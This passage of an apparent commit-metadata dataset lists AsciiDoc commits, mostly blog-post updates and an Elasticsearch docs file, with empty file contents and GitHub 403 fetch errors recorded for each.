h\/elasticsearch,kevinkluge\/elasticsearch,wangtuo\/elasticsearch,dataduke\/elasticsearch,jimhooker2002\/elasticsearch,strapdata\/elassandra-test,pranavraman\/elasticsearch,jbertouch\/elasticsearch,lchennup\/elasticsearch,karthikjaps\/elasticsearch,gingerwizard\/elasticsearch,infusionsoft\/elasticsearch,ckclark\/elasticsearch,infusionsoft\/elasticsearch,camilojd\/elasticsearch,mgalushka\/elasticsearch,winstonewert\/elasticsearch,mcku\/elasticsearch,ouyangkongtong\/elasticsearch,HonzaKral\/elasticsearch,ulkas\/elasticsearch,mcku\/elasticsearch,achow\/elasticsearch,nellicus\/elasticsearch,markllama\/elasticsearch,girirajsharma\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalimatas\/elasticsearch,YosuaMichael\/elasticsearch,bestwpw\/elasticsearch,elancom\/elasticsearch,a2lin\/elasticsearch,andrejserafim\/elasticsearch,gfyoung\/elasticsearch,markllama\/elasticsearch,18098924759\/elasticsearch,myelin\/elasticsearch,jchampion\/elasticsearch,LeoYao\/elasticsearch,jpountz\/elasticsearch,adrianbk\/elasticsearch,truemped\/elasticsearch,lydonchandra\/elasticsearch,btiernay\/elasticsearch,girirajsharma\/elasticsearch,wimvds\/elasticsearch,shreejay\/elasticsearch,obourgain\/elasticsearch,dataduke\/elasticsearch,andrejserafim\/elasticsearch,iantruslove\/elasticsearch,episerver\/elasticsearch,kunallimaye\/elasticsearch,Chhunlong\/elasticsearch,lzo\/elasticsearch-1,obourgain\/elasticsearch,ckclark\/elasticsearch,C-Bish\/elasticsearch,liweinan0423\/elasticsearch,humandb\/elasticsearch,strapdata\/elassandra-test,Ansh90\/elasticsearch,MjAbuz\/elasticsearch,lks21c\/elasticsearch,Helen-Zhao\/elasticsearch,beiske\/elasticsearch,gingerwizard\/elasticsearch,yongminxia\/elasticsearch,mjason3\/elasticsearch,knight1128\/elasticsearch,geidies\/elasticsearch,scottsom\/elasticsearch,sneivandt\/elasticsearch,andrestc\/elasticsearch,nilabhsagar\/elasticsearch,andrestc\/elasticsearch,ivansun1010\/elasticsearch,sneivandt\/elasticsearch,martinstuga\/elasticsearch,lks21c\/elasticsearch,likaiwalkman\/elasticsearch,fred84\/elasticsearch,vietlq\/elasticsearch,winstonewert\/elasticsearch,Liziyao\/elasticsearch,petabytedata\/elasticsearch,HonzaKral\/elasticsearch,mohit\/elasticsearch,mnylen\/elasticsearch,MichaelLiZhou\/elasticsearch,ivansun1010\/elasticsearch,HarishAtGitHub\/elasticsearch,yanjunh\/elasticsearch,caengcjd\/elasticsearch,truemped\/elasticsearch,apepper\/elasticsearch,sreeramjayan\/elasticsearch,huanzhong\/elasticsearch,andrestc\/elasticsearch,cnfire\/elasticsearch-1,caengcjd\/elasticsearch,ESamir\/elasticsearch,brandonkearby\/elasticsearch,lks21c\/elasticsearch,linglaiyao1314\/elasticsearch,fernandozhu\/elasticsearch,zkidkid\/elasticsearch,zkidkid\/elasticsearch,shreejay\/elasticsearch,zeroctu\/elasticsearch,tebriel\/elasticsearch,xingguang2013\/elasticsearch,jeteve\/elasticsearch,mbrukman\/elasticsearch,hydro2k\/elasticsearch,elasticdog\/elasticsearch,djschny\/elasticsearch,trangvh\/elasticsearch,LeoYao\/elasticsearch,bestwpw\/elasticsearch,zeroctu\/elasticsearch,adrianbk\/elasticsearch,tkssharma\/elasticsearch,nomoa\/elasticsearch,karthikjaps\/elasticsearch,xingguang2013\/elasticsearch,beiske\/elasticsearch,sdauletau\/elasticsearch,achow\/elasticsearch,MisterAndersen\/elasticsearch,himanshuag\/elasticsearch,wittyameta\/elasticsearch,ckclark\/elasticsearch,s1monw\/elasticsearch,Stacey-Gammon\/elasticsearch,jango2015\/elasticsearch,kcompher\/elasticsearch,vroyer\/elasticassandra,fekaputra\/elasticsearch,mortonsykes\/elasticsearch,sc0ttkclark\/elasticsearch,himanshuag\/elasticsearch,pablocastro\/elasticsearch,tahaemin\/elasticsearch,gfyoung\/elasticsearch,dylan8902\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,clintongormley\/elasticsearch,JSCooke\/elasticsearch,wayeast\/elasticsearch,MaineC\/elasticsearch,snikch\/elasticsearch,masterweb121\/elasticsearch,petabytedata\/elasticsearch,acchen97\/elasticsearch,umeshdangat\/elasticsearch,s1monw\/elasticsearch,pranavraman\/elasticsearch,kaneshin\/elasticsearch,wayeast\/elasticsearch,hirdesh2008\/elasticsearch,scottsom\/elasticsearch,luiseduardohdbackup\/elasticsearch,franklanganke\/elasticsearch,fernandozhu\/elasticsearch,tahaemin\/elasticsearch,fforbeck\/elasticsearch,LewayneNaidoo\/elasticsearch,amit-shar\/elasticsearch,yuy168\/elasticsearch,kimimj\/elasticsearch,yuy168\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,jimhooker2002\/elasticsearch,xingguang2013\/elasticsearch,PhaedrusTheGreek\/elasticsearch,xingguang2013\/elasticsearch,nknize\/elasticsearch,Shekharrajak\/elasticsearch,fforbeck\/elasticsearch,pranavraman\/elasticsearch,wenpos\/elasticsearch,sreeramjayan\/elasticsearch,nezirus\/elasticsearch,rhoml\/elasticsearch,StefanGor\/elasticsearch,wittyameta\/elasticsearch,pranavraman\/elasticsearch,queirozfcom\/elasticsearch,Charlesdong\/elasticsearch,hafkensite\/elasticsearch,lmtwga\/elasticsearch,slavau\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,kalburgimanjunath\/elasticsearch,jimhooker2002\/elasticsearch,NBSW\/elasticsearch,MetSystem\/elasticsearch,mohit\/elasticsearch,jeteve\/elasticsearch,btiernay\/elasticsearch,kubum\/elasticsearch,MjAbuz\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,humandb\/elasticsearch,awislowski\/elasticsearch,iacdingping\/elasticsearch,markllama\/elasticsearch,diendt\/elasticsearch,lightslife\/elasticsearch,EasonYi\/elasticsearch,henakamaMSFT\/elasticsearch,artnowo\/elasticsearch,sarwarbhuiyan\/elasticsearch,yuy168\/elasticsearch,jbertouch\/elasticsearch,kalburgimanjunath\/elasticsearch,winstonewert\/elasticsearch,Shekharrajak\/elasticsearch,lmtwga\/elasticsearch,sc0ttkclark\/elasticsearch,mikemccand\/elasticsearch,pranavraman\/elasticsearch,EasonYi\/elasticsearch,MichaelLiZhou\/elasticsearch,jprante\/elasticsearch,MjAbuz\/elasticsearch,xuzha\/elasticsearch,schonfeld\/elasticsearch,himanshuag\/elasticsearch,kimimj\/elasticsearch,masterweb121\/elasticsearch,mm0\/elasticsearch,jpountz\/elasticsearch,awislowski\/elasticsearch,xuzha\/elasticsearch,apepper\/elasticsearch,JervyShi\/elasticsearch,mapr\/elasticsearch,s1monw\/elasticsearch,dongjoon-hyun\/elasticsearch,mikemccand\/elasticsearch,andrestc\/elasticsearch,jbertouch\/elasticsearch,dpursehouse\/elasticsearch,awislowski\/elasticsearch,spiegela\/elasticsearch,ricardocerq\/elasticsearch,areek\/elasticsearch,mgalushka\/elasticsearch,polyfractal\/elasticsearch,sposam\/elasticsearch,nrkkalyan\/elasticsearch,Fsero\/elasticsearch,infusionsoft\/elasticsearch,PhaedrusTheGreek\/elasticsearch,ivansun1010\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,wbowling\/elasticsearch,fekaputra\/elasticsearch,luiseduardohdbackup\/elasticsearch,jango2015\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Fsero\/elasticsearch,vingupta3\/elasticsearch,mmaracic\/elasticsearch,onegambler\/elasticsearch,amit-shar\/elasticsearch,achow\/elasticsearch,rmuir\/elasticsearch,acchen97\/elasticsearch,nomoa\/elasticsearch,mm0\/elasticsearch,mjason3\/elasticsearch,onegambler\/elasticsearch,sarwarbhuiyan\/elasticsearch,rlugojr\/elasticsearch,bawse\/elasticsearch,ckclark\/elasticsearch,maddin2016\/elasticsearch,lydonchandra\/elasticsearch,elancom\/elasticsearch,areek\/elasticsearch,glefloch\/elasticsearch,xingguang2013\/elasticsearch,iamjakob\/elasticsearch,polyfractal\/elasticsearch,yynil\/elasticsearch,beiske\/elasticsearch,himanshuag\/elasticsearch,Shepard1212\/elasticsearch,liweinan0423\/elasticsearch,wbowling\/elasticsearch,yongminxia\/elasticsearch,andrestc\/elasticsearch,yongminxia\/elasticsearch,LeoYao\/elasticsearch,yanjunh\/elasticsearch,tebriel\/elasticsearch,rento19962\/elasticsearch,camilojd\/elasticsearch,mjason3\/elasticsearch,nellicus\/elasticsearch,andrejserafim\/elasticsearch,xingguang2013\/elasticsearch,Rygbee\/elasticsearch,sdauletau\/elasticsearch,hafkensite\/elasticsearch,mortonsykes\/elasticsearch,iantruslove\/elasticsearch,myelin\/elasticsearch,wenpos\/elasticsearch,kunallimaye\/elasticsearch,Rygbee\/elasticsearch,rmuir\/elasticsearch,alexshadow007\/elasticsearch,jchampion\/elasticsearch,amit-shar\/elasticsearch,jpountz\/elasticsearch,HarishAtGitHub\/elasticsearch,andrestc\/elasticsearch,cnfire\/elasticsearch-1,sarwarbhuiyan\/elasticsearch,Helen-Zhao\/elasticsearch,rhoml\/elasticsearch,iamjakob\/elasticsearch,xuzha\/elasticsearch,djschny\/elasticsearch,trangvh\/elasticsearch,strapdata\/elassandra,ouyangkongtong\/elasticsearch,gmarz\/elasticsearch,dylan8902\/elasticsearch,yuy168\/elasticsearch,martinstuga\/elasticsearch,fernandozhu\/elasticsearch,pozhidaevak\/elasticsearch,rajanm\/elasticsearch,zeroctu\/elasticsearch,acchen97\/elasticsearch,iantruslove\/elasticsearch,liweinan0423\/elasticsearch,Liziyao\/elasticsearch,gfyoung\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,shreejay\/elasticsearch,hirdesh2008\/elasticsearch,C-Bish\/elasticsearch,martinstuga\/elasticsearch,strapdata\/elassandra5-rc,djschny\/elasticsearch,scorpionvicky\/elasticsearch,mikemccand\/elasticsearch,xuzha\/elasticsearch,markharwood\/elasticsearch,clintongormley\/elasticsearch,MaineC\/elasticsearch,Fsero\/elasticsearch,vingupta3\/elasticsearch,iacdingping\/elasticsearch,dataduke\/elasticsearch,markharwood\/elasticsearch,drewr\/elasticsearch,tkssharma\/elasticsearch,drewr\/elasticsearch,markwalkom\/elasticsearch,scorpionvicky\/elasticsearch,truemped\/elasticsearch,masterweb121\/elasticsearch,mm0\/elasticsearch,vroyer\/elasticassandra,mgalushka\/elasticsearch,zeroctu\/elasticsearch,markharwood\/elasticsearch,nellicus\/elasticsearch,markllama\/elasticsearch,Siddartha07\/elasticsearch,huanzhong\/elasticsearch,scorpionvicky\/elasticsearch,bestwpw\/elasticsearch,slavau\/elasticsearch,awislowski\/elasticsearch,iamjakob\/elasticsearch,diendt\/elasticsearch,cnfire\/elasticsearch-1,tkssharma\/elasticsearch,humandb\/elasticsearch,ImpressTV\/elasticsearch,kubum\/elasticsearch,qwerty4030\/elasticsearch,kalimatas\/elasticsearch,jimczi\/elasticsearch,TonyChai24\/ESSource,sdauletau\/elasticsearch,acchen97\/elasticsearch,18098924759\/elasticsearch,obourgain\/elasticsearch,kevinkluge\/elasticsearch,snikch\/elasticsearch,NBSW\/elasticsearch,mapr\/elasticsearch,mjhennig\/elasticsearch,hirdesh2008\/elasticsearch,slavau\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,lmtwga\/elasticsearch,yongminxia\/elasticsearch,springning\/elasticsearch,huanzhong\/elasticsearch,girirajsharma\/elasticsearch,mnylen\/elasticsearch,mmaracic\/elasticsearch,ImpressTV\/elasticsearch,robin13\/elasticsearch,iantruslove\/elasticsearch,snikch\/elasticsearch,lightslife\/elasticsearch,IanvsPoplicola\/elasticsearch,glefloch\/elasticsearch,AndreKR\/elasticsearch,rento19962\/elasticsearch,Fsero\/elasticsearch,kalimatas\/elasticsearch,Shekharrajak\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,springning\/elasticsearch,djschny\/elasticsearch,naveenhooda2000\/elasticsearch,Widen\/elasticsearch,sposam\/elasticsearch,ImpressTV\/elasticsearch,djschny\/elasticsearch,areek\/elasticsearch,markllama\/elasticsearch,markwalkom\/elasticsearch,shreejay\/elasticsearch,lmtwga\/elasticsearch,HarishAtGitHub\/elasticsearch,areek\/elasticsearch,sreeramjayan\/elasticsearch,HonzaKral\/elasticsearch,iamjakob\/elasticsearch,lzo\/elasticsearch-1,umeshdangat\/elasticsearch,kevinkluge\/elasticsearch,nazarewk\/elasticsearch,yuy168\/elasticsearch,btiernay\/elasticsearch,palecur\/elasticsearch,queirozfcom\/elasticsearch,jeteve\/elasticsearch,ulkas\/elasticsearch,kubum\/elasticsearch,ivansun1010\/elasticsearch,yynil\/elasticsearch,hafkensite\/elasticsearch,mjhennig\/elasticsearch,i-am-Nathan\/elasticsearch,areek\/elasticsearch,markwalkom\/elasticsearch,18098924759\/elasticsearch,davidvgalbraith\/elasticsearch,rajanm\/elasticsearch,achow\/elasticsearch,TonyChai24\/ESSource,nazarewk\/elasticsearch,linglaiyao1314\/elasticsearch,EasonYi\/elasticsearch,camilojd\/elasticsearch,humandb\/elasticsearch,drewr\/elasticsearch,jpountz\/elasticsearch,xingguang2013\/elasticsearch,martinstuga\/elasticsearch,F0lha\/elasticsearch,mute\/elasticsearch,kingaj\/elasticsearch,umeshdangat\/elasticsearch,mjhennig\/elasticsearch,dongjoon-hyun\/elasticsearch,jeteve\/elasticsearch,uschindler\/elasticsearch,schonfeld\/elasticsearch,linglaiyao1314\/elasticsearch,amit-shar\/elasticsearch,martinstuga\/elasticsearch,Chhunlong\/elasticsearch,clintongormley\/elasticsearch,hanswang\/elasticsearch,adrianbk\/elasticsearch,sreeramjayan\/elasticsearch,rento19962\/elasticsearch,abibell\/elasticsearch,coding0011\/elasticsearch,cwurm\/elasticsearch,i-am-Nathan\/elasticsearch,markharwood\/elasticsearch,jprante\/elasticsearch,likaiwalkman\/elasticsearch,lightslife\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,Ansh90\/elasticsearch,girirajsharma\/elasticsearch,dongjoon-hyun\/elasticsearch,avikurapati\/elasticsearch,kaneshin\/elasticsearch,wayeast\/elasticsearch,jango2015\/elasticsearch,scottsom\/elasticsearch,jprante\/elasticsearch,AndreKR\/elasticsearch,apepper\/elasticsearch,sc0ttkclark\/elasticsearch,gingerwizard\/elasticsearch,fekaputra\/elasticsearch,GlenRSmith\/elasticsearch,kenshin233\/elasticsearch,jpountz\/elasticsearch,elasticdog\/elasticsearch,F0lha\/elasticsearch,rlugojr\/elasticsearch,truemped\/elasticsearch,masterweb121\/elasticsearch,coding0011\/elasticsearch,zeroctu\/elasticsearch,rajanm\/elasticsearch,gfyoung\/elasticsearch,diendt\/elasticsearch,rento19962\/elasticsearch,mm0\/elasticsearch,HarishAtGitHub\/elasticsearch,tsohil\/elasticsearch,huanzhong\/elasticsearch,JackyMai\/elasticsearch,jango2015\/elasticsearch,mgalushka\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,hydro2k\/elasticsearch,coding0011\/elasticsearch,mmaracic\/elasticsearch,a2lin\/elasticsearch,myelin\/elasticsearch,ImpressTV\/elasticsearch,palecur\/elasticsearch,MetSystem\/elasticsearch,kingaj\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Brijeshrpatel9\/elasticsearch,caengcjd\/elasticsearch,Helen-Zhao\/elasticsearch,brandonkearby\/elasticsearch,ZTE-PaaS\/elasticsearch,luiseduardohdbackup\/elasticsearch,pritishppai\/elasticsearch,fernandozhu\/elasticsearch,queirozfcom\/elasticsearch,MetSystem\/elasticsearch,socialrank\/elasticsearch,nazarewk\/elasticsearch,ouyangkongtong\/elasticsearch,Shepard1212\/elasticsearch,Helen-Zhao\/elasticsearch,springning\/elasticsearch,ivansun1010\/elasticsearch,MjAbuz\/elasticsearch,mjhennig\/elasticsearch,MisterAndersen\/elasticsearch,KimTaehee\/elasticsearch,jango2015\/elasticsearch,rmuir\/elasticsearch,apepper\/elasticsearch,Siddartha07\/elasticsearch,masaruh\/elasticsearch,palecur\/elasticsearch,Siddartha07\/elasticsearch,andrestc\/elasticsearch,Liziyao\/elasticsearch,jimhooker2002\/elasticsearch,markwalkom\/elasticsearch,coding0011\/elasticsearch,episerver\/elasticsearch,strapdata\/elassandra5-rc,slavau\/elasticsearch,weipinghe\/elasticsearch,Charlesdong\/elasticsearch,masterweb121\/elasticsearch,tkssharma\/elasticsearch,weipinghe\/elasticsearch,nellicus\/elasticsearch,schonfeld\/elasticsearch,apepper\/elasticsearch,fred84\/elasticsearch,clintongormley\/elasticsearch,socialrank\/elasticsearch,yynil\/elasticsearch,infusionsoft\/elasticsearch,lchennup\/elasticsearch,abibell\/elasticsearch,brandonkearby\/elasticsearch,pablocastro\/elasticsearch,karthikjaps\/elasticsearch,caengcjd\/elasticsearch,hirdesh2008\/elasticsearch,NBSW\/elasticsearch,MichaelLiZhou\/elasticsearch,rajanm\/elasticsearch,clintongormley\/elasticsearch,cnfire\/elasticsearch-1,nellicus\/elasticsearch,palecur\/elasticsearch,nrkkalyan\/elasticsearch,KimTaehee\/elasticsearch,amit-shar\/elasticsearch,GlenRSmith\/elasticsearch,i-am-Nathan\/elasticsearch,sarwarbhuiyan\/elasticsearch,IanvsPoplicola\/elasticsearch,pozhidaevak\/elasticsearch,JackyMai\/elasticsearch,mm0\/elasticsearch,Brijeshrpatel9\/elasticsearch,henakamaMSFT\/elasticsearch,knight1128\/elasticsearch,zkidkid\/elasticsearch,F0lha\/elasticsearch,humandb\/elasticsearch,Uiho\/elasticsearch,IanvsPoplicola\/elasticsearch,pablocastro\/elasticsearch,hydro2k\/elasticsearch,HarishAtGitHub\/elasticsearch,dpursehouse\/elasticsearch,KimTaehee\/elasticsearch,masaruh\/elasticsearch,Brijeshrpatel9\/elasticsearch,njlawton\/elasticsearch,wbowling\/elasticsearch,wittyameta\/elasticsearch,queirozfcom\/elasticsearch,MichaelLiZhou\/elasticsearch,jbertouch\/elasticsearch,Stacey-Gammon\/elasticsearch,springning\/elasticsearch,iacdingping\/elasticsearch,C-Bish\/elasticsearch,knight1128\/elasticsearch,Widen\/elasticsearch,lchennup\/elasticsearch,kcompher\/elasticsearch,Liziyao\/elasticsearch,springning\/elasticsearch,Brijeshrpatel9\/elasticsearch,mjason3\/elasticsearch,Fsero\/elasticsearch,wbowling\/elasticsearch,mbrukman\/elasticsearch,apepper\/elasticsearch,kaneshin\/elasticsearch,markllama\/elasticsearch,vingupta3\/elasticsearch,uschindler\/elasticsearch,dpursehouse\/elasticsearch,Stacey-Gammon\/elasticsearch,AndreKR\/elasticsearch,strapdata\/elassandra5-rc,strapdata\/elassandra-test,rlugojr\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,franklanganke\/elasticsearch,geidies\/elasticsearch,Siddartha07\/elasticsearch,petabytedata\/elasticsearch,wenpos\/elasticsearch,kubum\/elasticsearch,avikurapati\/elasticsearch,nezirus\/elasticsearch,abibell\/elasticsearch,mcku\/elasticsearch,kaneshin\/elasticsearch,AndreKR\/elasticsearch,EasonYi\/elasticsearch,caengcjd\/elasticsearch,cnfire\/elasticsearch-1,dataduke\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,wittyameta\/elasticsearch,myelin\/elasticsearch,davidvgalbraith\/elasticsearch,Collaborne\/elasticsearch,JSCooke\/elasticsearch,nrkkalyan\/elasticsearch,tsohil\/elasticsearch,i-am-Nathan\/elasticsearch,ckclark\/elasticsearch,kalburgimanjunath\/elasticsearch,polyfractal\/elasticsearch,rhoml\/elasticsearch,yanjunh\/elasticsearch,mcku\/elasticsearch,ulkas\/elasticsearch,vietlq\/elasticsearch,PhaedrusTheGreek\/elasticsearch,hirdesh2008\/elasticsearch,lzo\/elasticsearch-1,knight1128\/elasticsearch,jchampion\/elasticsearch,YosuaMichael\/elasticsearch,mohit\/elasticsearch,wangtuo\/elasticsearch,polyfractal\/elasticsearch,ZTE-PaaS\/elasticsearch","old_file":"docs\/reference\/mapping\/types.asciidoc","new_file":"docs\/reference\/mapping\/types.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5040dde85808e7eb8d2513f817e25d19de60c9f6","subject":"samples - add a playground file to test new features","message":"samples - add a playground file to test new features\n","repos":"joaompinto\/asciidoctor-vscode,joaompinto\/asciidoctor-vscode,joaompinto\/asciidoctor-vscode","old_file":"test\/samples\/playground.adoc","new_file":"test\/samples\/playground.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joaompinto\/asciidoctor-vscode.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ceb56939e278b21fd340dea6fa1e04a9d2b15fc","subject":"y2b create post Samsung Galaxy S4 Event LIVE COVERAGE! (Galaxy S IV)","message":"y2b create post Samsung Galaxy S4 Event LIVE COVERAGE! (Galaxy S IV)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-03-14-Samsung-Galaxy-S4-Event-LIVE-COVERAGE-Galaxy-S-IV.adoc","new_file":"_posts\/2013-03-14-Samsung-Galaxy-S4-Event-LIVE-COVERAGE-Galaxy-S-IV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"393939a4d6bf52a51bfb69b09d503fed7dbe83eb","subject":"Update 2015-09-25-title.adoc","message":"Update 2015-09-25-title.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-25-title.adoc","new_file":"_posts\/2015-09-25-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edf12d83c181e3bdacec53a8a23e4305b26cc255","subject":"Update 2015-07-16-Test-blog-post.adoc","message":"Update 2015-07-16-Test-blog-post.adoc","repos":"wayr\/wayr.github.io,wayr\/wayr.github.io,wayr\/wayr.github.io,wayr\/wayr.github.io","old_file":"_posts\/2015-07-16-Test-blog-post.adoc","new_file":"_posts\/2015-07-16-Test-blog-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wayr\/wayr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2083df5aa4712814e56828d371bbc55634107adc","subject":"y2b create post Does It Suck? - $60 Android Phone","message":"y2b create post Does It Suck? - $60 Android Phone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-07-19-Does-It-Suck--60-Android-Phone.adoc","new_file":"_posts\/2015-07-19-Does-It-Suck--60-Android-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd96ea6e4f8dd6bebd7e43f1e030abbdcbe525ca","subject":"y2b create post This Gadget Plays The Classics","message":"y2b create post This Gadget Plays The Classics","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-25-This-Gadget-Plays-The-Classics.adoc","new_file":"_posts\/2016-07-25-This-Gadget-Plays-The-Classics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63e7246a8c211f10ec8482a9dad73794ff1a36b4","subject":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","message":"Update 2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","repos":"lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io,lovian\/lovian.github.io","old_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_file":"_posts\/2017-01-01-Ngedrift-di-Sonic-All-Stars-Racing-Transformed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lovian\/lovian.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"53ea935531902e3153311c16478e970789e623bf","subject":"y2b create post Sharp Intros World's First 8K TV at CES 2012","message":"y2b create post Sharp Intros World's First 8K TV at CES 2012","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-11-Sharp-Intros-Worlds-First-8K-TV-at-CES-2012.adoc","new_file":"_posts\/2012-01-11-Sharp-Intros-Worlds-First-8K-TV-at-CES-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfd9ecd7eed813be2b6c7832c00729aea2ff984c","subject":"Create common-installingGrails-grails3.adoc","message":"Create common-installingGrails-grails3.adoc","repos":"grails\/grails-guides,grails\/grails-guides,grails\/grails-guides","old_file":"src\/main\/docs\/common-installingGrails-grails3.adoc","new_file":"src\/main\/docs\/common-installingGrails-grails3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grails\/grails-guides.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8350c3b4d4623b8c42368761f90c40915fcfbd2e","subject":"Update 2015-08-17-Council-and-Government-Website-Development.adoc","message":"Update 2015-08-17-Council-and-Government-Website-Development.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-08-17-Council-and-Government-Website-Development.adoc","new_file":"_posts\/2015-08-17-Council-and-Government-Website-Development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b919fe92cd4e5bdf127886772c97a6f49ef53402","subject":"Update 2015-12-29-Start-react-with-redux.adoc","message":"Update 2015-12-29-Start-react-with-redux.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-12-29-Start-react-with-redux.adoc","new_file":"_posts\/2015-12-29-Start-react-with-redux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b507cd001e2a1108f7b613978a0df1be934f8b1a","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f45800d3ca224a9e8f457e5c27274bc9578dcb6","subject":"Update 2015-05-17-Erstellt-euren-eigenen-Gert.adoc","message":"Update 2015-05-17-Erstellt-euren-eigenen-Gert.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-05-17-Erstellt-euren-eigenen-Gert.adoc","new_file":"_posts\/2015-05-17-Erstellt-euren-eigenen-Gert.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e7a3f9583412b1f811b223302ecd66a7d442719","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b402e5955c599a82f1a63680c10f6e641c8ca2e","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 